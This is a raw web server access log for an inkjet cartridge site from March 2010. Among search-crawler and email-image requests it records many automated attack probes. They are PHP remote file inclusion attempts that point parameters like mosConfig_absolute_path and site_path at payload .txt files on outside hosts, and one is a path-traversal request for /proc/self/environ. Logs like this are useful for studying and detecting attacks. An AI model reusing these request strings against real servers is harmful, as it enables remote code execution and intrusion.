64.15.152.132 - - [02/Mar/2010:05:10:24 -0800] "GET /logs/access_091201.log%20%20///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:05:10:35 -0800] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:05:10:35 -0800] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:05:10:35 -0800] "GET /logs/access_091201.log%20%20///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:05:15:57 -0800] "GET /phpbb/profile.php?mode=viewprofile&u=90 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
218.38.243.44 - - [02/Mar/2010:05:16:38 -0800] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.38.243.44 - - [02/Mar/2010:05:16:38 -0800] "GET /logs/access_091201.log%20%20///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.38.243.44 - - [02/Mar/2010:05:16:38 -0800] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
41.204.218.244 - - [02/Mar/2010:05:22:52 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
41.204.218.244 - - [02/Mar/2010:05:22:52 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
41.204.218.244 - - [02/Mar/2010:05:22:52 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.122.251.114 - - [02/Mar/2010:05:24:52 -0800] "GET /logs/scripts.log%20%20///?modul=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.122.251.114 - - [02/Mar/2010:05:24:53 -0800] "GET /logs///?modul=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.122.251.114 - - [02/Mar/2010:05:24:53 -0800] "GET //?modul=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.122.251.114 - - [02/Mar/2010:05:25:33 -0800] "GET /logs/scripts.log///?modul=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.122.251.114 - - [02/Mar/2010:05:26:54 -0800] "GET /logs/scripts.log///?modul=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
41.204.218.244 - - [02/Mar/2010:05:27:16 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
41.204.218.244 - - [02/Mar/2010:05:27:16 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.150.205.156 - - [02/Mar/2010:05:30:21 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "site.inkjetcartridge.com"
219.150.205.156 - - [02/Mar/2010:05:30:21 -0800] "GET /logs/access.log//index2.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "site.inkjetcartridge.com"
219.150.205.155 - - [02/Mar/2010:05:30:26 -0800] "GET /logs//index2.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:05:52:33 -0800] "GET /phpbb/viewtopic.php?p=924 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:05:56:38 -0800] "GET /phpbb/viewtopic.php?p=476 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:56:46 -0800] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:56:46 -0800] "GET /logs/access_091201.log%20%20///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:56:46 -0800] "GET /logs///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:57:03 -0800] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:57:03 -0800] "GET /logs///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:57:03 -0800] "GET /logs/access_091201.log%20%20///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:06:04:53 -0800] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:06:04:53 -0800] "GET /logs///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:06:04:54 -0800] "GET /logs/access_091201.log%20%20///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:07:40 -0800] "GET /phpbb/viewtopic.php?t=172 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:23:08 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:23:10 -0800] "GET /phpbb/viewtopic.php?t=956&start=0&postdays=0&postorder=asc&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:23:17 -0800] "GET /phpbb/viewtopic.php?p=2989 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:06:26:20 -0800] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:06:26:20 -0800] "GET /logs///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:06:26:20 -0800] "GET /logs/access_091201.log%20%20///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:06:27:03 -0800] "GET /logs/access_091201.log%20%20///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:06:27:03 -0800] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:06:27:03 -0800] "GET /logs///administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:28:11 -0800] "GET /phpbb/viewtopic.php?p=2246 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:29:13 -0800] "GET /phpbb/viewtopic.php?p=3105 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:06:31:47 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 2133 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:06:31:52 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:06:31:52 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 1088 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:33:57 -0800] "GET /phpbb/viewtopic.php?p=2395 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:42:15 -0800] "GET /phpbb/viewtopic.php?p=654 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:48:23 -0800] "GET /phpbb/viewtopic.php?p=8853 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:49:44 -0800] "GET /links/links8_6.html HTTP/1.0" 200 29446 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
207.46.204.232 - - [02/Mar/2010:06:53:18 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:54:39 -0800] "GET /phpbb/viewtopic.php?t=93 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:06:56:05 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:06:56:05 -0800] "GET /logs/access_100101.log/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:06:56:05 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:06:58:55 -0800] "GET /phpbb/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
207.46.204.232 - - [02/Mar/2010:07:01:14 -0800] "GET /links/?N=A HTTP/1.1" 200 6611 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:07:04:31 -0800] "GET /phpbb/viewtopic.php?p=81 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:07:04:33 -0800] "GET /logs/access_100101.log/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:07:04:33 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:07:04:33 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.199.37 - - [02/Mar/2010:07:05:13 -0800] "GET /tmp/?M=D HTTP/1.1" 200 802 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
151.99.231.20 - - [02/Mar/2010:07:26:17 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
151.99.231.20 - - [02/Mar/2010:07:26:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
151.99.231.20 - - [02/Mar/2010:07:26:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
205.167.182.250 - - [02/Mar/2010:07:26:24 -0800] "GET /email/images/inkmail21_01.gif HTTP/1.1" 200 7485 "http://webmail.medscape.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.4; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
205.167.182.250 - - [02/Mar/2010:07:26:24 -0800] "GET /email/images/inkmail21_02.gif HTTP/1.1" 200 15159 "http://webmail.medscape.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.4; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
205.167.182.250 - - [02/Mar/2010:07:26:24 -0800] "GET /email/images/inkmail21_03.gif HTTP/1.1" 200 16134 "http://webmail.medscape.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.4; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
205.167.182.250 - - [02/Mar/2010:07:26:24 -0800] "GET /email/images/inkmail21_04.gif HTTP/1.1" 200 15283 "http://webmail.medscape.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.4; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
205.167.182.250 - - [02/Mar/2010:07:26:24 -0800] "GET /email/images/inkmail21_05.gif HTTP/1.1" 200 15725 "http://webmail.medscape.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.4; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
205.167.182.250 - - [02/Mar/2010:07:26:24 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.1" 200 24052 "http://webmail.medscape.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.4; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
69.123.173.78 - - [02/Mar/2010:07:42:04 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.1" 200 24052 "http://co106w.col106.mail.live.com/mail/InboxLight.aspx?FolderID=00000000-0000-0000-0000-000000000001&InboxSortAscending=False&InboxSortBy=Date&n=2071054103" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
69.123.173.78 - - [02/Mar/2010:07:42:04 -0800] "GET /email/images/inkmail21_02.gif HTTP/1.1" 200 15159 "http://co106w.col106.mail.live.com/mail/InboxLight.aspx?FolderID=00000000-0000-0000-0000-000000000001&InboxSortAscending=False&InboxSortBy=Date&n=2071054103" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
69.123.173.78 - - [02/Mar/2010:07:42:04 -0800] "GET /email/images/inkmail21_04.gif HTTP/1.1" 200 15283 "http://co106w.col106.mail.live.com/mail/InboxLight.aspx?FolderID=00000000-0000-0000-0000-000000000001&InboxSortAscending=False&InboxSortBy=Date&n=2071054103" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
69.123.173.78 - - [02/Mar/2010:07:42:04 -0800] "GET /email/images/inkmail21_03.gif HTTP/1.1" 200 16134 "http://co106w.col106.mail.live.com/mail/InboxLight.aspx?FolderID=00000000-0000-0000-0000-000000000001&InboxSortAscending=False&InboxSortBy=Date&n=2071054103" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:07:56:07 -0800] "GET /phpbb/viewtopic.php?t=1525 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:00:43 -0800] "GET /phpbb/viewtopic.php?p=4209 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:05:39 -0800] "GET /phpbb/profile.php?mode=viewprofile&u=3 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
85.214.67.226 - - [02/Mar/2010:08:10:58 -0800] "GET /?page=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 200 2132 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "site.inkjetcartridge.com"
85.214.67.226 - - [02/Mar/2010:08:10:58 -0800] "GET /?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2132 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "site.inkjetcartridge.com"
85.214.67.226 - - [02/Mar/2010:08:10:58 -0800] "GET /?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 2132 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "site.inkjetcartridge.com"
85.214.67.226 - - [02/Mar/2010:08:10:59 -0800] "GET /logs/scripts.log//?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "site.inkjetcartridge.com"
85.214.67.226 - - [02/Mar/2010:08:10:59 -0800] "GET /logs/scripts.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "site.inkjetcartridge.com"
207.46.204.192 - - [02/Mar/2010:08:13:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:20:28 -0800] "GET /phpbb/viewtopic.php?t=1079&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
8.11.2.10 - - [02/Mar/2010:08:21:19 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "ShopWiki/1.0 ( +http://www.shopwiki.com/wiki/Help:Bot)" "site.inkjetcartridge.com"
200.78.235.181 - - [02/Mar/2010:08:21:54 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.78.235.181 - - [02/Mar/2010:08:21:54 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.78.235.181 - - [02/Mar/2010:08:21:54 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.78.235.181 - - [02/Mar/2010:08:22:22 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.78.235.181 - - [02/Mar/2010:08:22:22 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.78.235.181 - - [02/Mar/2010:08:22:25 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:22:28 -0800] "GET /phpbb/viewtopic.php?p=795 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
210.114.222.95 - - [02/Mar/2010:08:23:41 -0800] "GET /logs/scripts.log//include/admin.lib.inc.php?site_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.114.222.95 - - [02/Mar/2010:08:23:41 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.114.222.95 - - [02/Mar/2010:08:23:41 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.204.192 - - [02/Mar/2010:08:24:44 -0800] "GET /links/links6_4.html HTTP/1.1" 200 28425 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:08:24:50 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:08:25:22 -0800] "GET /include/bbs.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:08:25:22 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:08:25:22 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:26:19 -0800] "GET /phpbb/viewtopic.php?t=827 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:08:27:44 -0800] "GET /phpbb/viewtopic.php?t=1391&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:08:31:05 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
